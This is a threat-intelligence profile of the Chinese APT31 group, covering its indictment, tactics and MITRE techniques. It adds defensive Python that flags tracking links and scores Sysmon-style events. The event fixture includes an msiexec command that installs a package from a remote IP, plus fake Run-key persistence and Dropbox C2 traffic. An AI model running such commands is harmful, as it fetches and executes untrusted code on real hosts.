APT31, also known as ZIRCONIUM or Judgment Panda, is a Chinese state-sponsored threat group engaged in cyber espionage and targeted intrusions. A US DOJ indictment outlines roughly 14 years of operations, front companies, malware usage, and mass spearphishing campaigns tied to China's strategic objectives. #APT31 #ZIRCONIUM #JudgmentPanda #WuhanXRZ #EvilOSX #CobaltStrike
Keypoints
- APT31 is a Chinese state-sponsored actor with ties to the Ministry of State Security and conducts espionage and targeted intrusions on a global scale.
- The US Department of Justice indicted seven individuals linked to APT31 for conspiracy to commit computer intrusions and wire fraud, spanning roughly 14 years.
- The group sent more than 10,000 malicious emails containing tracking links to harvest recipient data (such as IP addresses and device details) for subsequent attacks on networks, email accounts, cloud storage, and call records.
- APT31 employed a dual-phase approach: first gather reconnaissance data from the tracking emails, then carry out direct intrusions, including targeting victims' family members and compromising small office/home office (SOHO) routers.
- Early operations used malware families like RAWDOOR, Trochilus, EvilOSX, DropDoor/DropCat, then shifted to cracked versions of Cobalt Strike for persistence and access.
- The indictment notes high-profile targeting (e.g., supporters of the Hong Kong Umbrella Movement), an intrusion of a defense contractor's subsidiary used to pivot into the parent's core networks, and a combination of exploits (a 0-day privilege escalation and SQL injection).
- Front companies such as Wuhan XRZ, with support from Wuhan Liuhe, were used to conceal operations; the group also relied on dual-infection techniques, planting two independent footholds so it could re-enter a compromised network after one was removed.
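The tracking-link phase described above is worth operationalizing on the mail gateway: the lure is harmless to open, but the link or beacon inside it carries a per-recipient identifier that reports back who opened it and from where. The following Python is an added example, not code from the original profile or from SOCRadar; it parses a constructed sample message (the sender, hosts and token are invented) and flags links with the three traits such beacons typically share: an opaque token embedded in the path, the recipient's address echoed in the query string, and a 1x1 image.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample lure (not a real APT31 message): one per-recipient
# tracking link, one 1x1 beacon image, and one ordinary link for contrast.
SAMPLE_EML = """\
From: "Conference Team" <invite@example-events.test>
To: analyst@victim.test
Subject: Invitation: Policy Forum 2024
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear colleague, please confirm attendance:</p>
<a href="http://cdn-track.example-events.test/r/5f3a9c1be2d74f0a8b6c1d2e3f4a5b6c?u=analyst%40victim.test">Register</a>
<img src="http://cdn-track.example-events.test/p/5f3a9c1be2d74f0a8b6c1d2e3f4a5b6c.gif" width="1" height="1">
<a href="https://www.example-events.test/agenda">Agenda</a>
</body></html>
"""

# Long hex or base64url-like runs in a URL path are the usual shape of a
# per-recipient tracking token. Threshold (24 hex / 32 alnum) is an assumption.
TOKEN_RE = re.compile(r"[0-9a-fA-F]{24,}|[A-Za-z0-9_-]{32,}")


class _LinkExtractor(HTMLParser):
    """Collect <a href> and <img src> URLs together with their attributes."""

    def __init__(self):
        super().__init__()
        self.links = []  # list of (tag, url, attrs)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(("a", a["href"], a))
        elif tag == "img" and a.get("src"):
            self.links.append(("img", a["src"], a))


def analyze_tracking_links(raw_eml: str):
    """Return a list of suspicious links with the reasons each was flagged."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return []
    parser = _LinkExtractor()
    parser.feed(html_part.get_content())

    findings = []
    for tag, url, attrs in parser.links:
        parsed = urlparse(url)
        reasons = []
        if TOKEN_RE.search(parsed.path):
            reasons.append("opaque per-recipient token in path")
        # parse_qs percent-decodes, so %40 becomes "@" before this check.
        qs = parse_qs(parsed.query)
        if any("@" in v for values in qs.values() for v in values):
            reasons.append("recipient address in query string")
        if tag == "img" and attrs.get("width") == "1" and attrs.get("height") == "1":
            reasons.append("1x1 beacon image")
        if reasons:
            findings.append({"url": url, "host": parsed.hostname, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_tracking_links(SAMPLE_EML):
        print(f["host"], "->", "; ".join(f["reasons"]))
```

In production the same checks run on the gateway before delivery; a hit does not prove malice (marketing mail uses identical tokens), but a token that also differs per recipient across a batch of messages to the same organization is exactly the reconnaissance the indictment describes, and is worth blocking or rewriting through a click-time proxy.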
MITRE Techniques
- [T1583.001] Acquire Infrastructure: Domains – “ZIRCONIUM purchased domains for targeted campaigns.”
- [T1583.006] Acquire Infrastructure: Web Services – “ZIRCONIUM used GitHub to host malware linked in spearphishing emails.”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – “ZIRCONIUM created a Registry Run key for persistence with a malicious binary.”
- [T1059.003] Command and Scripting Interpreter: Cmd – “ZIRCONIUM opened a Windows Command Shell on a remote host.”
- [T1059.006] Command and Scripting Interpreter: Python – “ZIRCONIUM used Python-based implants for interaction with compromised hosts.”
- [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – “ZIRCONIUM stole credentials from web browsers.”
- [T1140] Deobfuscate/Decode Files or Information – “ZIRCONIUM used AES-256 decryption for exploit code.”
- [T1573.001] Encrypted Channel: Symmetric Cryptography – “ZIRCONIUM utilized AES encrypted communications in C2.”
- [T1041] Exfiltration Over C2 Channel – “ZIRCONIUM exfiltrated files via the Dropbox API C2.”
- [T1567.002] Exfiltration Over Web Service – “ZIRCONIUM exfiltrated data to Dropbox.”
- [T1068] Exploitation for Privilege Escalation – “ZIRCONIUM exploited CVE-2017-0005 for local escalation.”
- [T1105] Ingress Tool Transfer – “ZIRCONIUM downloaded malicious files to compromised hosts.”
- [T1036.004] Masquerading: Masquerade Task or Service – “ZIRCONIUM used a run key for masking a persistence mechanism.”
- [T1027.002] Obfuscated Files or Information: Software Packing – “ZIRCONIUM used multi-stage packers for exploit code.”
- [T1566.002] Phishing: Spearphishing Link – “ZIRCONIUM used malicious links in emails for malware delivery.”
- [T1598.003] Phishing for Information: Spearphishing Link – “ZIRCONIUM targeted presidential campaign staffers with credential phishing emails.”
- [T1012] Query Registry – “ZIRCONIUM queried the Registry for proxy settings.”
- [T1218.007] System Binary Proxy Execution: Msiexec – “ZIRCONIUM used msiexec.exe for downloading and executing malicious MSI files.”
- [T1082] System Information Discovery – “ZIRCONIUM captured processor architecture for C2 registration.”
- [T1016] System Network Configuration Discovery – “ZIRCONIUM enumerated proxy settings.”
- [T1033] System Owner/User Discovery – “ZIRCONIUM captured usernames for C2 registration.”
- [T1124] System Time Discovery – “ZIRCONIUM captured system time for C2 registration.”
- [T1204.001] User Execution: Malicious Link – “ZIRCONIUM used malicious links for malware downloads.”
- [T1102.002] Web Service: Bidirectional Communication – “ZIRCONIUM used Dropbox for bidirectional C2 communication and execution of commands.”
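Several of the host-side techniques above (msiexec fetching a remote MSI, a Run key pointing at a user-writable path, a Python implant executing from a temp directory, and a non-browser process talking to the Dropbox API) are cheap to detect in endpoint telemetry. The following Python is an added example, not code from the original profile or from SOCRadar: it runs four simple rules over constructed Sysmon-style events (the field names are simplified analogs of Sysmon event IDs 1, 13 and 3, and the hostnames, paths and IP address are invented), returning the technique ID for each match.

```python
import re

# Constructed telemetry (not real APT31 artifacts). id 1 = process create,
# id 13 = registry value set, id 3 = network connection.
EVENTS = [
    {"id": 1, "host": "ws-17", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /q /i http://203.0.113.45/update/msi.png"},
    {"id": 1, "host": "ws-17", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2301-x64.msi"'},
    {"id": 13, "host": "ws-17", "image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "key": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate",
     "data": r"C:\Users\alice\AppData\Roaming\OneDriveUpdate\svchost.exe"},
    {"id": 13, "host": "ws-17", "image": r"C:\Windows\explorer.exe",
     "key": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"id": 3, "host": "ws-17", "image": r"C:\Users\alice\AppData\Roaming\OneDriveUpdate\svchost.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
    {"id": 3, "host": "ws-17", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
    {"id": 1, "host": "ws-22", "image": r"C:\Users\bob\AppData\Local\Temp\py\pythonw.exe",
     "cmd": r"pythonw.exe C:\Users\bob\AppData\Local\Temp\py\client.py"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Locations a standard user can write to; binaries persisted from here deserve scrutiny.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.IGNORECASE)
# Dropbox API endpoints are assumptions for the example; tune to your proxy logs.
DROPBOX_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "api.dropbox.com"}
# Processes for which Dropbox traffic is expected and therefore not flagged.
EXPECTED_DROPBOX_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "dropbox.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (technique_id, host, detail) for every event that matches a rule."""
    findings = []
    for e in events:
        image = _basename(e.get("image", ""))
        # T1218.007: msiexec handed a URL installs straight from a remote server.
        if e["id"] == 1 and image == "msiexec.exe" and URL_RE.search(e.get("cmd", "")):
            findings.append(("T1218.007", e["host"], e["cmd"]))
        # T1059.006: Python interpreter running out of a user-writable directory.
        if e["id"] == 1 and image in PYTHON_IMAGES and USER_WRITABLE_RE.search(e["image"]):
            findings.append(("T1059.006", e["host"], e["cmd"]))
        # T1547.001: Run key whose target lives in a user-writable directory.
        if e["id"] == 13 and RUN_KEY_RE.search(e.get("key", "")) and USER_WRITABLE_RE.search(e.get("data", "")):
            findings.append(("T1547.001", e["host"], e["key"]))
        # T1102.002 / T1567.002: Dropbox API reached by something other than a browser or the official client.
        if e["id"] == 3 and e.get("dest_host") in DROPBOX_HOSTS and image not in EXPECTED_DROPBOX_CLIENTS:
            findings.append(("T1102.002", e["host"], f"{image} -> {e['dest_host']}:{e['dest_port']}"))
    return findings


if __name__ == "__main__":
    for technique, host, detail in detect(EVENTS):
        print(f"{technique} {host} {detail}")
```

The Run-key and Dropbox rules are the ones that pay for themselves: the legitimate OneDrive entry and the browser's Dropbox traffic in the sample are left alone, while the same persistence path showing up as both the Run-key target and the source of the cloud C2 connection is the pattern a single alert should stitch together. Allow-listing by process name is deliberately weak (an implant can masquerade as chrome.exe), so in production pair it with a signer or hash check on the image.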
Indicators of Compromise
- [SHA-256 Hash] Latest IoCs – 74f7a3b2a5df81eb7b5e0c5c4af8548e61dc37c608dda458b75b58852f2f2cfd, f332a941d786148a35cec683edb965ea4bbd6ff6bd871880f30dc7d42b922443, and 10 more hashes
Read more: https://socradar.io/dark-web-profile-apt31/